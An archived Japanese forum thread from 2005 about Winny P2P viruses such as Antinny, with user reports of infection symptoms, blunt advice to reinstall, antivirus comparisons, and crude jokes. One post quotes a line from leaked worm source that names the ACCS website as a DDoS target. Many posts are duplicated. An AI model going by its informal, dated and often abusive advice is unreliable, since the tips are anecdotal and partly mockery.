無料のセキュリティソフトもいろいろあるんだから何か入れとけよ
719 :[名無し]さん(bin+cue).rar:05/01/22 22:41:05 ID:pbiKEUJ/O
ウィルスに感染した後、立ち上げたらフリーズしたまんまです
これってウィルスが原因なんでしょうか?
どんな種類のウィルスなんでしょうか?
これってウィルスが原因なんでしょうか?
どんな種類のウィルスなんでしょうか?
720 :[名無し]さん(bin+cue).rar:05/01/22 22:42:30 ID:2JmZBj4z0
知るかよボケ。てめぇのちんぽ咥えてろ
721 :[名無し]さん(bin+cue).rar:05/01/22 22:48:40 ID:BOlMSm7J0
咥えてみたけどちょっと塩辛いです
あと咥えてたら大きくなってきたんですけどどうしましょう?
あと咥えてたら大きくなってきたんですけどどうしましょう?
722 :[名無し]さん(bin+cue).rar:05/01/22 22:49:38 ID:2JmZBj4z0
回線切って好きにしろ
723 :[名無し]さん(bin+cue).rar:05/01/22 22:56:26 ID:6nEEKGAx0
>719
ウイルスかどうかなんてどうでもいいじゃん
どうせ動かないんだし
俺はアンチウイルスソフトはブラウジング用に入れてる
nyのウイルスはdelexe使って見つけてば感染しないし
ウイルスかどうかなんてどうでもいいじゃん
どうせ動かないんだし
俺はアンチウイルスソフトはブラウジング用に入れてる
nyのウイルスはdelexe使って見つけてば感染しないし
724 :[名無し]さん(bin+cue).rar:05/01/22 23:02:32 ID:pbiKEUJ/O
>723
動かないってどういう事なんですか?
取り敢えず、対処する方法はないのでしょうか?
動かないってどういう事なんですか?
取り敢えず、対処する方法はないのでしょうか?
725 :[名無し]さん(bin+cue).rar:05/01/22 23:14:42 ID:i3gkjxmN0
お前ら>>1も読まない奴に構いすぎ
726 :[名無し]さん(bin+cue).rar:05/01/22 23:30:19 ID:pbiKEUJ/O
1は読んだのですが・・・なにせ携帯なのですみません。
やはり再インスツールしなきゃ駄目なんですね。あとはどんな被害が考えられますか?
すみません。共有のパソなんで困ってます
やはり再インスツールしなきゃ駄目なんですね。あとはどんな被害が考えられますか?
すみません。共有のパソなんで困ってます
727 :[名無し]さん(bin+cue).rar:05/01/22 23:33:55 ID:1eY9+bkd0
共有してる他ユーザーからの罵詈雑言を楽しみにしてなよ。
728 :[名無し]さん(bin+cue).rar:05/01/22 23:42:04 ID:zFq3skff0
しかし、共有のパソでよくnyやる気になれたなぁ・・・。
729 :[名無し]さん(bin+cue).rar:05/01/22 23:56:35 ID:pbiKEUJ/O
nyは、デスクトップにあったからクリックしただけw
730 :[名無し]さん(bin+cue).rar:05/01/22 23:58:07 ID:BOlMSm7J0
クリックしただけw
とか携帯で打ち込んでる暇あったら早く再インスコしてきなさいって。
とか携帯で打ち込んでる暇あったら早く再インスコしてきなさいって。
731 :[名無し]さん(bin+cue).rar:05/01/22 23:59:56 ID:rRltZF0s0
732 :[名無し]さん(bin+cue).rar:05/01/23 00:09:06 ID:WcLZfESn0
鼻水、くしゃみが酷いのですが何のウィルスですか?
733 :[名無し]さん(bin+cue).rar:05/01/23 00:09:47 ID:9q01a8k3O
再インスコ済ませましたw
「俺のパソ触ったの誰や!」と怒号が聞こえる前に寝ようと思います。
「俺のパソ触ったの誰や!」と怒号が聞こえる前に寝ようと思います。
734 :[名無し]さん(bin+cue).rar:05/01/23 00:17:15 ID:buEohIEW0
また関西弁か
735 :[名無し]さん(bin+cue).rar:05/01/23 00:19:52 ID:9q01a8k3O
>731
画像をひろって、クリックしたら眼鏡オヤジの画像。
その後、ウイルススキャンで感染を確認。再軌道したらフリーズしたまんまでした。
画像をひろって、クリックしたら眼鏡オヤジの画像。
その後、ウイルススキャンで感染を確認。再軌道したらフリーズしたまんまでした。
736 :[名無し]さん(bin+cue).rar:05/01/23 00:40:53 ID:Lfb95cPF0
セーフモードで起動するとか、もう遅いが
737 :[名無し]さん(bin+cue).rar:05/01/23 00:43:20 ID:IQlnTrUX0
ようやっと>>494のファイルを手に入れることが出来た。
既報の通りPascalで書かれている。
あるファイルの先頭あたりに
TARGET_NAME = 'www.accsjp.or.jp';
という記述があるし、先のACCSの発表にあるように、こいつがDDOSしていたと
考えるのが妥当のようだ。
これが本物であるという保証はどこにもないが。
既報の通りPascalで書かれている。
あるファイルの先頭あたりに
TARGET_NAME = 'www.accsjp.or.jp';
という記述があるし、先のACCSの発表にあるように、こいつがDDOSしていたと
考えるのが妥当のようだ。
これが本物であるという保証はどこにもないが。
738 :[名無し]さん(bin+cue).rar:05/01/23 00:59:24 ID:cb6x0rtC0
それがキンタマ(Antinny.K)クオリティ!
739 :[名無し]さん(bin+cue).rar:05/01/23 02:54:37 ID:p29G5dI70
こんばんは。
ボクはニ○ポンハムのウ○ニーが大好きな男子です。
ボクはウイ○ーがとても、すごく大好きですが
最近はノロウイルスが怖くて、あんまり食べていません。
ばあちゃんにその事を相談したら、ウイ○ーのウイルスの事だったら
ここで聞いたらどんな事でも、教えてくれると言っていました。
どうしたらウイルスに掛からずにウ○ニーが出来ますか?
ボクはニ○ポンハムのウ○ニーが大好きな男子です。
ボクはウイ○ーがとても、すごく大好きですが
最近はノロウイルスが怖くて、あんまり食べていません。
ばあちゃんにその事を相談したら、ウイ○ーのウイルスの事だったら
ここで聞いたらどんな事でも、教えてくれると言っていました。
どうしたらウイルスに掛からずにウ○ニーが出来ますか?
740 :[名無し]さん(bin+cue).rar:05/01/23 03:03:14 ID:LI622b1O0
>>739
その文章で誰かが笑うと思ったのかい?
その文章で誰かが笑うと思ったのかい?
741 :[名無し]さん(bin+cue).rar:05/01/23 03:04:52 ID:W1zL8MiD0
742 :[名無し]さん(bin+cue).rar:05/01/23 04:35:13 ID:sdOvGSzm0
【使用OS】 XP
【WindowsUpdateしてるか】 してる
【AntiVirusは】 してる
【ちゃんとUpdateしてるか】 してる
【スキャンした結果】 異常なし
【オンラインスキャンしたならその結果は】してない
【Winnyのバージョン】 winny2b71
【Winny歴、総DL量は】 一年、たぶん100Gくらい
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 した
【症状か具体的に、分かる限りすべて書く】
C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txtが作成される。
Winny\DownフォルダがBBS2と言うUPフォルダになる。
上と同じ場所に、Windouws起動毎に***.exe(***はいろいろ)という偽造フォルダが作成される。
タイムスタンプが1984など、異常に古いフォルダが作成される。
regeditがメモ帳になる
【何をしたらそんなことになったのか】
解凍したおまけの『無題.exe』を謝ってダブルクリック。
【これまでにとった措置】
作成されたフォルダの消去
怪しいスタートアップを消去
テンプレにあるその1かその2のどちらとも分からない症状でorz
誰かこれの駆除方法わかる香具師いない?
【WindowsUpdateしてるか】 してる
【AntiVirusは】 してる
【ちゃんとUpdateしてるか】 してる
【スキャンした結果】 異常なし
【オンラインスキャンしたならその結果は】してない
【Winnyのバージョン】 winny2b71
【Winny歴、総DL量は】 一年、たぶん100Gくらい
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 した
【症状か具体的に、分かる限りすべて書く】
C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txtが作成される。
Winny\DownフォルダがBBS2と言うUPフォルダになる。
上と同じ場所に、Windouws起動毎に***.exe(***はいろいろ)という偽造フォルダが作成される。
タイムスタンプが1984など、異常に古いフォルダが作成される。
regeditがメモ帳になる
【何をしたらそんなことになったのか】
解凍したおまけの『無題.exe』を謝ってダブルクリック。
【これまでにとった措置】
作成されたフォルダの消去
怪しいスタートアップを消去
テンプレにあるその1かその2のどちらとも分からない症状でorz
誰かこれの駆除方法わかる香具師いない?
743 :[名無し]さん(bin+cue).rar:05/01/23 04:47:17 ID:g/C6lHSf0
窓から投げ捨てろ
744 :[名無し]さん(bin+cue).rar:05/01/23 05:59:38 ID:10YKm3Gt0
ウィルス目の前にしながら
誤ってダブルクリックか・・・
誤字は良いとして緊張が足りないな
誤ってダブルクリックか・・・
誤字は良いとして緊張が足りないな
745 :[名無し]さん(bin+cue).rar:05/01/23 06:50:02 ID:JNyvOEw00
とりあえずオンラインスキャン必須だろ
あとAntiVirusのアプリ名も書いておけ、バスター2001とか疑っちゃうよ
あとAntiVirusのアプリ名も書いておけ、バスター2001とか疑っちゃうよ
746 :[名無し]さん(bin+cue).rar:05/01/23 07:39:21 ID:W1zL8MiD0
駆除方法は概ね見当がつくが、残念ながら俺は香具師じゃなくて技術屋だ
だから教えてやんねー
だから教えてやんねー
747 :[名無し]さん(bin+cue).rar:05/01/23 08:09:57 ID:PgniyLX90
>無題.exe
こんな物にポインタを近づけるというのは
下着でスラム街を歩くようなものだ
こんな物にポインタを近づけるというのは
下着でスラム街を歩くようなものだ
748 :[名無し]さん(bin+cue).rar:05/01/23 11:54:02 ID:pJA2y39n0
当スレ質問テンプレにおいて
AntiVirusソフトを入れてUpdateもしている奴 12人
Updateしていない、AntiVirusソフト未使用 8人
下段の奴らは、生命保険どころか健康保険に入ってないのと同じだ。
AntiVirusソフトを入れてUpdateもしている奴 12人
Updateしていない、AntiVirusソフト未使用 8人
下段の奴らは、生命保険どころか健康保険に入ってないのと同じだ。
749 :[名無し]さん(bin+cue).rar:05/01/23 15:41:52 ID:TrRe64ir0
とりあえず、拡張子を見てからクリックせよ。だいたい、exeファイルなんて落さねぇだろ。
無視条件にexeでも入れときナ。
無視条件にexeでも入れときナ。
750 :[名無し]さん(bin+cue).rar:05/01/23 15:47:39 ID:DF7JEDEh0
拡張子表示をオンにしてないようなやつがny動かしてるこんな世の中じゃ(ry
751 :[名無し]さん(bin+cue).rar:05/01/23 16:20:23 ID:f5gZhM8w0
ポイズン
752 :[名無し]さん(bin+cue).rar:05/01/23 18:04:20 ID:PR4XKToC0
>>750
だから世の中楽しい
だから世の中楽しい
753 :[名無し]さん(bin+cue).rar:05/01/23 18:18:14 ID:4YUDdCbi0
>752
お前人生悟ってるな
お前人生悟ってるな
754 :[名無し]さん(bin+cue).rar:05/01/23 19:05:50 ID:mVibmYuK0
人を騙して楽しんでるこんな世の中じゃ(ry
755 :[名無し]さん(bin+cue).rar:05/01/23 19:09:23 ID:B7vv1Ggb0
ポイズン
756 :[名無し]さん(bin+cue).rar:05/01/23 20:46:28 ID:O5cZmxjY0
今度「レジストリエディタがメモ帳に云々」って輩が来たら>>39見せればそれでいいじゃん
757 :[名無し]さん(bin+cue).rar:05/01/23 21:11:05 ID:BvzDjrGy0
D:\System Volume Information\_restore{EC12BC5A-5BD9-4112-A1C8-A19C204BA208}\RP706\A0388256.exe は W32.HLLW.Antinny.G に感染しています。
K:\System Volume Information\_restore{EC12BC5A-5BD9-4112-A1C8-A19C204BA208}\RP707\A0390533.exe は W32.HLLW.Antinny に感染しています。
K:\System Volume Information\_restore{EC12BC5A-5BD9-4112-A1C8-A19C204BA208}\RP707\A0390533.exe は W32.HLLW.Antinny に感染しています。
758 :[名無し]さん(bin+cue).rar:05/01/23 21:42:22 ID:ur3/oY220
またrestoreかよ。
こいつらの辞書には「検索」という言葉がないのか?
こいつらの辞書には「検索」という言葉がないのか?
759 :[名無し]さん(bin+cue).rar:05/01/23 21:48:41 ID:vg0/EW2x0
ねーよ
760 :[名無し]さん(bin+cue).rar:05/01/23 22:52:53 ID:BA3E/mLX0
ウィルスソフトはノートンとバスターどっちがいいのかね。P2P使うにあたって
761 :[名無し]さん(bin+cue).rar:05/01/23 23:11:38 ID:qbVtWPFT0
762 :[名無し]さん(bin+cue).rar:05/01/23 23:48:50 ID:BA3E/mLX0
いや、今ノートン使ってんだけど。バスターに変えようか迷ってんだよね。
やっぱノートンで重いも安全か
やっぱノートンで重いも安全か
763 :[名無し]さん(bin+cue).rar:05/01/23 23:59:43 ID:hTiYVn9C0
お前がバスターに変えようと思ってるその理由は?
764 :[名無し]さん(bin+cue).rar:05/01/24 00:04:27 ID:sxyz1kOy0
"やっぱ重いノートンでも安全か"か?意味分かんないけど。
ノートンが重いからバスターに変えたいと思われ。
ノートンが重いからバスターに変えたいと思われ。
765 :[名無し]さん(bin+cue).rar:05/01/24 00:06:41 ID:FgDOVe3I0
ウィルスソフトって事はウィルス本体だろ?
ウィルス本体なアンチウィルスっつーたらマカフィじゃねーかw
ウィルス本体なアンチウィルスっつーたらマカフィじゃねーかw
766 :[名無し]さん(bin+cue).rar:05/01/24 00:14:57 ID:8WIM1OFA0
767 :[名無し]さん(bin+cue).rar:05/01/24 00:22:27 ID:oO3uXK3A0
つまり、ノートンとバスターはP2P擁護派なわけだ
768 :[名無し]さん(bin+cue).rar:05/01/24 00:27:49 ID:Ygt4KPNh0
ACCS以上にP2Pを研究してるセキュリティ企業とも言えるわけだが
769 :[名無し]さん(bin+cue).rar:05/01/24 03:39:35 ID:G+/vB13F0
まぁあれだ、
ポップアップブロック提供してるくせに、自社製品のアップデートでポップアップ必須
な仕様にするのがもぅね、だめぽ。
ポップアップブロック提供してるくせに、自社製品のアップデートでポップアップ必須
な仕様にするのがもぅね、だめぽ。
770 :[名無し]さん(bin+cue).rar:05/01/24 09:49:02 ID:P9EeHRPl0
バスターは(最終的には対応するけど)ともかく
nyの新しいウイルスには対応が遅い
検体の提出方法がユーザーのみなのが致命的と思われ
nyの新しいウイルスには対応が遅い
検体の提出方法がユーザーのみなのが致命的と思われ
771 :[名無し]さん(bin+cue).rar:05/01/24 09:55:38 ID:gcbQZLF20
まあ、企業や団体が網はってる一般ウイルスとは経路が異なるから
なぁ。掲示板にうpするようなのはともかく、ny内で拡散するよう
なのは自業自得で片付けられそうな悪寒。
そのうち自前のP2Pエンジンを持ったやつも、出てくるかもしれん
けどね。nyが入ってないパソコンにファイル経由で感染、勝手に
うpしまくるとか。(´・ω・`)
なぁ。掲示板にうpするようなのはともかく、ny内で拡散するよう
なのは自業自得で片付けられそうな悪寒。
そのうち自前のP2Pエンジンを持ったやつも、出てくるかもしれん
けどね。nyが入ってないパソコンにファイル経由で感染、勝手に
うpしまくるとか。(´・ω・`)
772 :[名無し]さん(bin+cue).rar:05/01/24 11:05:57 ID:sXOurUnW0
ttp://impulse.dyndns.info:9999/uploadedFiles/966bf45f-4557-44c6-8854-a8cb4d356328.bmp
これってキンタマにやられちゃった?
これってキンタマにやられちゃった?
773 :[名無し]さん(bin+cue).rar:05/01/24 11:14:32 ID:Qi4V0sMk0
bmpで上げる人って珍しいな・・・と思った
774 :[名無し]さん(bin+cue).rar:05/01/24 11:31:27 ID:gcbQZLF20
>>772
つか見れねー。
つか見れねー。
776 :[名無し]さん(bin+cue).rar:05/01/24 11:43:51 ID:Qcfe5Dmg0
EXEを踏む奴
・エロ18禁ゲー(キモイ)
・エロ系のZIP(馬鹿)
・コスプレ、ネトアのZIP(ヲタ)
解決する方法はひとつだけ→ フォーマット
777 :[名無し]さん(bin+cue).rar:05/01/24 12:17:45 ID:saLjmAt30
不細工まじめ:がり勉 イケメンまじめ:知的
不細工マッチョ:デブきもい イケメンマッチョ:スポーツマン
不細工暗い:根暗キモイ イケメン暗い:クール
不細工面白い:笑われ者 イケメン面白い:人気者
不細工高学歴高収入:金の亡者 イケメン高学歴高収入:エリート
不細工リーダー:調子に乗るな イケメンリーダー:頼りがいがある
不細工おしゃれ:勘違いもいいとこ イケメンおしゃれ:イケテル
不細工低身長・高身長:キモイ・怖い イケメン低身長・高身長:カワイイ・カッコイイ
不細工フリーター:さっさと就職しろボケ イケメンフリーター:夢に向かってがんばってね
不細工マニア:おたくキモイ、敬遠される イケメンマニア:流行の発信源、関心持たれる
不細工童貞:一生そのままでいろ イケメン童貞:私が捨てさせてあげるわ
不細工犯罪者:いつかやると思ってたわ死刑まだかしら イケメン犯罪者:私が一緒に背負ってあげる
不細工マッチョ:デブきもい イケメンマッチョ:スポーツマン
不細工暗い:根暗キモイ イケメン暗い:クール
不細工面白い:笑われ者 イケメン面白い:人気者
不細工高学歴高収入:金の亡者 イケメン高学歴高収入:エリート
不細工リーダー:調子に乗るな イケメンリーダー:頼りがいがある
不細工おしゃれ:勘違いもいいとこ イケメンおしゃれ:イケテル
不細工低身長・高身長:キモイ・怖い イケメン低身長・高身長:カワイイ・カッコイイ
不細工フリーター:さっさと就職しろボケ イケメンフリーター:夢に向かってがんばってね
不細工マニア:おたくキモイ、敬遠される イケメンマニア:流行の発信源、関心持たれる
不細工童貞:一生そのままでいろ イケメン童貞:私が捨てさせてあげるわ
不細工犯罪者:いつかやると思ってたわ死刑まだかしら イケメン犯罪者:私が一緒に背負ってあげる
ny起動しようとしても、起動した瞬間強制終了されておまけにキャッシュが消えていくという怪奇現象がおきてるから
100%やられてるか・・・orz
駆除しようとしても、『怪しい値』なんかわからねぇよヽ(`Д´)ノ
100%やられてるか・・・orz
駆除しようとしても、『怪しい値』なんかわからねぇよヽ(`Д´)ノ
779 :[名無し]さん(bin+cue).rar:05/01/24 13:00:57 ID:ObWb1dOH0
>>778
再インスコしとけ。
再インスコしとけ。
780 :[名無し]さん(bin+cue).rar:05/01/24 13:32:31 ID:2eNcTb+b0
>777
君に幸あれ
君に幸あれ
781 :[名無し]さん(bin+cue).rar:05/01/24 14:10:20 ID:1FR4swkX0
>『怪しい値』なんかわからねぇよ
こういう奴が(ry
ところで、テンプレから
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm
が消えてんな。まとめサイトのほうにはあるが。
レジストリリスト ttp://higaitaisaku.web.infoseek.co.jp/iru.html のほうはなぜか403だが、
誰か見られるか?
こういう奴が(ry
ところで、テンプレから
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm
が消えてんな。まとめサイトのほうにはあるが。
レジストリリスト ttp://higaitaisaku.web.infoseek.co.jp/iru.html のほうはなぜか403だが、
誰か見られるか?
782 :[名無し]さん(bin+cue).rar:05/01/24 15:08:17 ID:gcbQZLF20
>>781
見れないね。(´・ω・`)
WaybackMachineにあったから、落としておいたほうが大吉。
ttp://web.archive.org/web/20031208183802/http://higaitaisaku.web.infoseek.co.jp/iru.html
見れないね。(´・ω・`)
WaybackMachineにあったから、落としておいたほうが大吉。
ttp://web.archive.org/web/20031208183802/http://higaitaisaku.web.infoseek.co.jp/iru.html
783 :[名無し]さん(bin+cue).rar:05/01/24 15:36:12 ID:1FR4swkX0
>>782
アクセス不可じゃなく消えてたか・・・?
ともかく確認d。
てかレジストリのエントリじゃなくHijackThisのログの説明か。
なら ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm が生きてれば十分だな
まあ、レジストリのRunの項目はそうそう増減しないから、
クリーンインスコ直後とかにSS撮っといて定期的に見比べれば問題はないんだが・・・
ウイルスに引っかかる香具師に限ってこういうことしてないんだろうなぁ
アクセス不可じゃなく消えてたか・・・?
ともかく確認d。
てかレジストリのエントリじゃなくHijackThisのログの説明か。
なら ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm が生きてれば十分だな
まあ、レジストリのRunの項目はそうそう増減しないから、
クリーンインスコ直後とかにSS撮っといて定期的に見比べれば問題はないんだが・・・
ウイルスに引っかかる香具師に限ってこういうことしてないんだろうなぁ
784 :[名無し]さん(bin+cue).rar:05/01/24 15:43:46 ID:AvTJ0MSS0
不細工まじめ:がり勉 イケメンまじめ:知的
不細工マッチョ:デブきもい イケメンマッチョ:スポーツマン
不細工暗い:根暗キモイ イケメン暗い:クール
不細工面白い:笑われ者 イケメン面白い:人気者
不細工高学歴高収入:金の亡者 イケメン高学歴高収入:エリート
不細工リーダー:調子に乗るな イケメンリーダー:頼りがいがある
不細工おしゃれ:勘違いもいいとこ イケメンおしゃれ:イケテル
不細工低身長・高身長:キモイ・怖い イケメン低身長・高身長:カワイイ・カッコイイ
不細工フリーター:さっさと就職しろボケ イケメンフリーター:夢に向かってがんばってね
不細工マニア:おたくキモイ、敬遠される イケメンマニア:流行の発信源、関心持たれる
不細工童貞:一生そのままでいろ イケメン童貞:私が捨てさせてあげるわ
不細工犯罪者:いつかやると思ってたわ死刑まだかしら イケメン犯罪者:私が一緒に背負ってあげる
手直ししてみた
不細工マッチョ:デブきもい イケメンマッチョ:スポーツマン
不細工暗い:根暗キモイ イケメン暗い:クール
不細工面白い:笑われ者 イケメン面白い:人気者
不細工高学歴高収入:金の亡者 イケメン高学歴高収入:エリート
不細工リーダー:調子に乗るな イケメンリーダー:頼りがいがある
不細工おしゃれ:勘違いもいいとこ イケメンおしゃれ:イケテル
不細工低身長・高身長:キモイ・怖い イケメン低身長・高身長:カワイイ・カッコイイ
不細工フリーター:さっさと就職しろボケ イケメンフリーター:夢に向かってがんばってね
不細工マニア:おたくキモイ、敬遠される イケメンマニア:流行の発信源、関心持たれる
不細工童貞:一生そのままでいろ イケメン童貞:私が捨てさせてあげるわ
不細工犯罪者:いつかやると思ってたわ死刑まだかしら イケメン犯罪者:私が一緒に背負ってあげる
手直ししてみた
785 :[名無し]さん(bin+cue).rar:05/01/24 19:35:07 ID:eO7ffAKU0
どうでもいいんだけど 俺のリア友がテキストがみんなぬるぽ(AAが入ってただかなんだか)になってそれからWindowsが起動しなくなった(なんとかDllが足りない出てた)んだけどこれ何?
786 :[名無し]さん(bin+cue).rar:05/01/24 19:40:42 ID:Cb4NG5BA0
自分のマシンが吹っ飛んで、携帯から書き込んでると正直に言えよ。
そしたら「テンプレ読んで対処しろ」って助言してやるから。
そしたら「テンプレ読んで対処しろ」って助言してやるから。
787 :[名無し]さん(bin+cue).rar:05/01/24 20:11:44 ID:LlUkA2wZ0
そろそろパソコンから紫の煙が出たり小宇宙が燃えあげるようなウイルスが欲しいな
788 :[名無し]さん(bin+cue).rar:05/01/24 20:19:52 ID:V3XRQXWN0
IDの最後がO(オー)なら携帯。とかなんとか。
789 :[名無し]さん(bin+cue).rar:05/01/24 20:55:08 ID:/zOwp+WC0
なんか赤い発心できてるよ。ウィルスか知らん。
790 :[名無し]さん(bin+cue).rar:05/01/24 21:26:46 ID:VD87LNBc0
あんまり掻くなよ
余計悪化するぞ
余計悪化するぞ
791 :[名無し]さん(bin+cue).rar:05/01/24 21:32:56 ID:lWxDkA0e0
病院へ行ってきなよ
皮膚科あたりにでも
皮膚科あたりにでも
792 :[名無し]さん(bin+cue).rar:05/01/24 21:49:07 ID:deO9hjjN0
再インスコしなよ
すべてを捨てて
すべてを捨てて
793 :[名無し]さん(bin+cue).rar:05/01/24 22:00:55 ID:Cb4NG5BA0
フォーマットはともかく
インスコは誰がするんだ?
インスコは誰がするんだ?
794 :[名無し]さん(bin+cue).rar:05/01/24 22:23:27 ID:GDUAcZyx0
おれおれ
795 :[名無し]さん(bin+cue).rar:05/01/24 22:45:34 ID:lWxDkA0e0
ソフトが入ってなきゃただの箱(マネキン)だよ
796 :[名無し]さん(bin+cue).rar:05/01/24 22:46:24 ID:lWxDkA0e0
すまん俺が壊れてるみたいだ・・・
797 :[名無し]さん(bin+cue).rar:05/01/24 23:13:36 ID:q4sCJkWY0
798 :[名無し]さん(bin+cue).rar:05/01/24 23:32:05 ID:REEpQ8cW0
>>797
移転してるなら早く言ってん
移転してるなら早く言ってん
799 :[名無し]さん(bin+cue).rar:05/01/24 23:55:17 ID:Cb4NG5BA0
>>798
ざぶとん一枚。(w
ざぶとん一枚。(w
800 :[名無し]さん(bin+cue).rar:05/01/25 07:25:25 ID:aJHU9tUF0
なあ、前もってupフォルダをつくっておいて書込み禁止にしとけばええんとちゃう?
801 :[名無し]さん(bin+cue).rar:05/01/25 08:00:56 ID:mQJLs4wJ0
>>795
漏れのパソコンは、インテリアとしてもクールでカコイイデザインだぞ
漏れのパソコンは、インテリアとしてもクールでカコイイデザインだぞ
802 :[名無し]さん(bin+cue).rar:05/01/25 09:09:31 ID:cURyULtl0
803 :[名無し]さん(bin+cue).rar:05/01/25 11:32:35 ID:1/BGLag+0
私はNYなんてやってませんし、パソコン使い始めて3ヶ月ですが、WinXP SP2、O
ffice2003ともにパッチは毎日確認。
コンピュータの名前やユーザー名、パスワードはランダムの英数字。
ハードディスクの中身には個人情報など見られて困るようなもの、
個人を特定できるものは一切入れない。
ウイルススパイウェア対策はNorton Internet Security2005、ウイルスバ
スター2005、AVG、Ad-aware SE PE、SpywareGuard常駐。SpywareGuardも入
れてる。これらも毎日最新の状態にしてスキャン。
ルータでパケットフィルタリングの設定。
インターネットやる場合でもActiveXやJava Scriptは無効にしたりタグブラ
ウザ使うなどの自衛はしてますよ。
これでも安全とはいえないんでしょ?
ffice2003ともにパッチは毎日確認。
コンピュータの名前やユーザー名、パスワードはランダムの英数字。
ハードディスクの中身には個人情報など見られて困るようなもの、
個人を特定できるものは一切入れない。
ウイルススパイウェア対策はNorton Internet Security2005、ウイルスバ
スター2005、AVG、Ad-aware SE PE、SpywareGuard常駐。SpywareGuardも入
れてる。これらも毎日最新の状態にしてスキャン。
ルータでパケットフィルタリングの設定。
インターネットやる場合でもActiveXやJava Scriptは無効にしたりタグブラ
ウザ使うなどの自衛はしてますよ。
これでも安全とはいえないんでしょ?
804 :[名無し]さん(bin+cue).rar:05/01/25 11:38:09 ID:U28tlMU/0
私はN
まで読んだ
まで読んだ
805 :[名無し]さん(bin+cue).rar:05/01/25 11:42:04 ID:ieuUjHJl0
ここは釣り堀ではありません
806 :[名無し]さん(bin+cue).rar:05/01/25 12:12:07 ID:ixVE4Qpm0
私はニューヨーク
まで読んだ
まで読んだ
807 :[名無し]さん(bin+cue).rar:05/01/25 12:24:48 ID:mQJLs4wJ0
age 長文の時点で読んでない
808 :[名無し]さん(bin+cue).rar:05/01/25 13:32:04 ID:aYPYrz+b0
読んじゃったよ!!
809 :[名無し]さん(bin+cue).rar:05/01/25 14:25:08 ID:JKDfOBFz0
>>808
穢されちゃったね。
穢されちゃったね。
810 :[名無し]さん(bin+cue).rar:05/01/25 14:34:18 ID:zk4tUQzn0
>803
要するに不安でいたたまれず寝不足で死にそう。という話。
要するに不安でいたたまれず寝不足で死にそう。という話。
811 :[名無し]さん(bin+cue).rar:05/01/25 14:56:16 ID:thsr1/En0
バスターていまいちウィルスの対応が遅い。ノートンは仕事早い
812 :[名無し]さん(bin+cue).rar:05/01/25 15:41:40 ID:mQJLs4wJ0
その分ノートンは重いし、バグも多い
813 :[名無し]さん(bin+cue).rar:05/01/25 16:11:44 ID:thsr1/En0
その通り。
814 :[名無し]さん(bin+cue).rar:05/01/25 16:27:35 ID:W9IEwP3b0
815 :[名無し]さん(bin+cue).rar:05/01/25 17:03:39 ID:blMxZl8g0
だまれ小僧!
816 :送信アンテナ様:05/01/25 17:05:35 ID:Eu5leiyW0
流行種その4
【スクリーンセーバー(仮称)】
に感染したぽ、うぇ
壁紙が winny ハツラツぅ
って書いてある画像に変更されてうぇ
爆音で元気ハツラツのCM?みたいなのが流れた
とりあえずタスクマネジャーは起動しねうぇ
既出ですか?
【スクリーンセーバー(仮称)】
に感染したぽ、うぇ
壁紙が winny ハツラツぅ
って書いてある画像に変更されてうぇ
爆音で元気ハツラツのCM?みたいなのが流れた
とりあえずタスクマネジャーは起動しねうぇ
既出ですか?
817 :[名無し]さん(bin+cue).rar:05/01/25 17:58:54 ID:3jSymdrD0
チンポ痒い
818 :[名無し]さん(bin+cue).rar:05/01/25 18:48:59 ID:hmGDmPMN0
>>816
うるさい
うるさい
819 :[名無し]さん(bin+cue).rar:05/01/25 18:59:33 ID:KbL9qk1P0
テンプレに載っていることをわざわざ報告するようなやつがいるこんな世の中じゃ(ry
820 :[名無し]さん(bin+cue).rar:05/01/25 19:12:54 ID:KqWTV5aj0
ポイズン
821 :[名無し]さん(bin+cue).rar:05/01/25 19:58:57 ID:Nnag8c1W0
なんか最近
.folder
の拡張子のファイルがいっぱいみつかるんだけどなにこれ?
昔はみかけなかったんだが・・・。
.folder
の拡張子のファイルがいっぱいみつかるんだけどなにこれ?
昔はみかけなかったんだが・・・。
あぁ書き忘れ、ノートンで反応がない.folder形式ね。
823 :[名無し]さん(bin+cue).rar:05/01/25 20:53:01 ID:MjXxnqYl0
なんか最近勝手に再起動するんだけど・・なんで?
824 :[名無し]さん(bin+cue).rar:05/01/25 21:00:20 ID:spseaqlw0
>>136と同じmellpoって奴に引っ掛かった。
この頃の油断とマンネリでノートン先生に依存しきっていてたよo...rz
ノートン反応せず。反省した。
症状は
mellpoフォルダが自動作成されて、
何故かDドライブに「ふたりエッチ25巻」のjpgがズラーっと並んでますた
この頃の油断とマンネリでノートン先生に依存しきっていてたよo...rz
ノートン反応せず。反省した。
症状は
mellpoフォルダが自動作成されて、
何故かDドライブに「ふたりエッチ25巻」のjpgがズラーっと並んでますた
825 :[名無し]さん(bin+cue).rar:05/01/25 21:08:57 ID:KbL9qk1P0
>>819
俺なのか俺なのか俺なのか?
ちなみにwavファイルの名前は愚かな民だった うぇ
いや、さんざん既出ならいいんだけどね・・
そのなんたらとは関係なかったのかね・・
まあ、天ぷらの対策やら予防やら見てるとキモイどころか何やってるのかと
感染すればいいじゃないかと、途中退室くらいいいじゃないかと・・
え?9連鎖・・ がんばれと・・・
ノートンとかもうアホかと・・
俺なのか俺なのか俺なのか?
ちなみにwavファイルの名前は愚かな民だった うぇ
いや、さんざん既出ならいいんだけどね・・
そのなんたらとは関係なかったのかね・・
まあ、天ぷらの対策やら予防やら見てるとキモイどころか何やってるのかと
感染すればいいじゃないかと、途中退室くらいいいじゃないかと・・
え?9連鎖・・ がんばれと・・・
ノートンとかもうアホかと・・
827 :[名無し]さん(bin+cue).rar:05/01/25 21:49:03 ID:mz4t81dG0
寝れ
828 :[名無し]さん(bin+cue).rar:05/01/25 22:30:40 ID:qqsvBnOT0
ノートンとバスターは一長一短。
選択は自分のお好みで。
選択は自分のお好みで。
829 :[名無し]さん(bin+cue).rar:05/01/25 22:34:42 ID:cURyULtl0
「うぇ」ってのはうさだ萌えの「はげ」と同義と見倣して桶?
830 :[名無し]さん(bin+cue).rar:05/01/25 23:41:08 ID:3yngg//J0
>>824
ノートンとバスターに提出しといて
ノートンとバスターに提出しといて
831 :送信アンテナ様:05/01/26 01:39:09 ID:sZfcHUWE0
